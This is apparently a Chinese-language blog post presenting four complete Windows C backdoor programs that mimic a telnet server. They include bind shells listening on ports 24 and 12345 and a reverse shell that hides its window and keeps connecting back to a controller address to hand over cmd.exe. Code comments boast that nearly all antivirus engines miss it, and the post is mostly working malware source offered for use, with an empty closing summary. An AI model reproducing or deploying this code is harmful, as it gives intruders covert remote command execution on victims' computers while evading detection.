仿telnet后门
先看看一個通過管道實現進程通信的后門
// // 模仿Telnet(服務器)小程序(單管道版,本地監聽24端口) // // 病毒檢測: 多引擎殺毒只有一款冰島的殺毒軟件查殺其他全過 // // 客戶端 : windows自帶telnet客戶端 或者 nc 都可以 // // 小 BUG : 有的時候不能及時顯示命令返回信息,再敲一個回車就可以了,查找原因時 // 每當調試就立即返回信息,去掉斷點的話還是得多輸入回車,郁悶。 //#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <winsock.h> #pragma comment (lib, "Ws2_32")//這個版本雖然回顯不正確,但是仍然可以執行命令 int main(int argc, char* argv[]) {//初始化網絡庫WSADATA ws;WSAStartup(MAKEWORD(2,2), &ws);//socket地址struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;//創建socketint CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(24);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));listen(CreateSocket, 5);printf("等待連接中......\n");int AcceptAddrSize = sizeof(struct sockaddr_in);int AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);printf("已有客戶端成功連接\n");//管道句柄HANDLE hReadPipe;HANDLE hWritePipe;//打開管道SECURITY_ATTRIBUTES pipeattr;pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);pipeattr.lpSecurityDescriptor = 0;pipeattr.bInheritHandle = true;BOOL ret_CreatePipe = CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);//進程參數STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;//SI.hStdOutput = SI.hStdError = hWritePipe;SI.hStdOutput = hWritePipe;//輸出命令執行結果SI.hStdInput = hReadPipe;//獲取命令//進程信息PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//管道讀取緩沖區char Buff_peek[MAX_PATH] = {0};char Buff_read[MAX_PATH] = {0};unsigned long lBytesRead;char remoteCommandStr[MAX_PATH] = {0};int remoteCommandLen = 0;while(1){//查詢管道內是否有可讀數據BOOL ret_PeekNamedPipe = PeekNamedPipe(hReadPipe, Buff_peek, MAX_PATH, &lBytesRead, NULL, NULL);int ret_send = 0;if( lBytesRead ){BOOL ret_ReadFile = ReadFile(hReadPipe, Buff_read, lBytesRead, &lBytesRead, 
0);ret_send = send(AcceptSocket, Buff_read, lBytesRead, 0);}else{//接收發過來的數據char buf[256] = {0};int recvCount = recv(AcceptSocket,buf,256,0);//telnet工具入口if (recvCount==1 || recvCount==2){if (!(buf[0]==0x0a && recvCount==1)){}remoteCommandStr[remoteCommandLen++]=buf[0];if (recvCount==2 && buf[0]==0x0d && buf[0]==0x0d){printf("接受到命令:%s",remoteCommandStr);if (strcmp(buf,"exit") == 0 || strcmp(buf,"bye") == 0){return 0;}//執行命令_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",remoteCommandStr);BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//初始化命令remoteCommandLen = 0;memset(remoteCommandStr,0,MAX_PATH);}}else if (recvCount>3)//nc工具入口{//末尾置零//buf[recvCount-1]= 0x00;//執行命令_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",buf);BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//初始化命令remoteCommandLen = 0;memset(remoteCommandStr,0,MAX_PATH);}}}return 0; } 上面的小后門有個缺點就是不能反彈,可能加上lcx就可以反彈了,下面給出一份可以反彈的后門 // // 模仿Telnet(服務器)小程序(WSASocket版,反彈式連接) // // 病毒檢測: 多引擎殺毒只有一款冰島的殺毒軟件查殺其他全過 // // 客戶端 : 反彈式連接,啟動時指定控制端地址和端口 telnet serverip serverport // //#include "stdafx.h" #include <stdio.h> #include <winsock2.h> #include <Windows.h> #pragma comment (lib, "Ws2_32") //隱藏窗口 #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") int main(int argc, char* argv[]) {//解析啟動參數if (argc!=3){printf("==================================================\n");printf("========usege:telnet serverip serverport=========\n");printf("==================================================\n");return 0;}char serverIP[20] = {0};int serverPort;strncpy(serverIP,argv[1],20);serverPort = atoi(argv[2]);//初始化網絡庫WSADATA ws;SOCKET ConnectSocket;WSAStartup(MAKEWORD(2,2), &ws);//連接到外網struct sockaddr_in server;server.sin_family = AF_INET;server.sin_port = htons(serverPort);server.sin_addr.S_un.S_addr = inet_addr(serverIP);//無限循環while (1){//創建異步套接字ConnectSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);int 
ret_con;do{Sleep(1000);//連接到控制端ret_con = connect(ConnectSocket, (struct sockaddr *)&server, sizeof(server));}while (SOCKET_ERROR == ret_con);//進程啟動參數STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;//輸出信息SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)ConnectSocket;PROCESS_INFORMATION PI;char cmdLine[] = "cmd.exe";//創建進程CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &SI, &PI);}return 0; }下面再給出兩個代碼,一個雙管實現通信的本地監聽,一個是無管道本地監聽,有了上面兩份代碼,下面兩份代碼就沒有什么大用,只是做通信練習 // Server.cpp : Defines the entry point for the console application. //#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <winsock.h> #pragma comment (lib, "Ws2_32")int main(int argc, char* argv[]) {WSADATA ws;int CreateSocket;int AcceptSocket;struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;WSAStartup(MAKEWORD(2,2), &ws);CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(12345);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;int ret_bind = bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));int ret_listen = listen(CreateSocket, 5);printf("等待連接中......");int AcceptAddrSize;AcceptAddrSize = sizeof(struct sockaddr_in);AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);HANDLE hReadPipe;HANDLE hWritePipe;HANDLE hReadPipe2;HANDLE hWritePipe2;SECURITY_ATTRIBUTES pipeattr;SECURITY_ATTRIBUTES pipeattr2;pipeattr.nLength = 15;pipeattr.lpSecurityDescriptor = 0;pipeattr.bInheritHandle = true;pipeattr2.nLength = 15;pipeattr2.lpSecurityDescriptor = 0;pipeattr2.bInheritHandle = true;CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);CreatePipe(&hReadPipe2, &hWritePipe2, &pipeattr2, 0);//closesocket( CreateSocket );//closesocket( AcceptSocket );STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;SI.hStdOutput = SI.hStdError = 
hWritePipe;SI.hStdInput = hReadPipe2;PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);char Buff[MAX_PATH];unsigned long lBytesRead;while(1){PeekNamedPipe(hReadPipe, Buff, MAX_PATH, &lBytesRead, NULL, NULL);if( lBytesRead ){ReadFile(hReadPipe, Buff, lBytesRead, &lBytesRead, 0);send(AcceptSocket, Buff, lBytesRead, 0);}else{lBytesRead = recv(AcceptSocket, Buff, MAX_PATH, 0);WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);}}return 0; }
// Server.cpp : Defines the entry point for the console application. //#include <stdio.h> #include <winsock2.h> #pragma comment (lib, "Ws2_32")int main(int argc, char* argv[]) {WSADATA ws;int CreateSocket;int AcceptSocket;struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;WSAStartup(MAKEWORD(2,2), &ws);//CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(12345);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));listen(CreateSocket, 5);printf("等待連接中......");int AcceptAddrSize;AcceptAddrSize = sizeof(struct sockaddr_in);AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);closesocket( CreateSocket );//closesocket( AcceptSocket );STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)AcceptSocket;PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);return 0; }
總結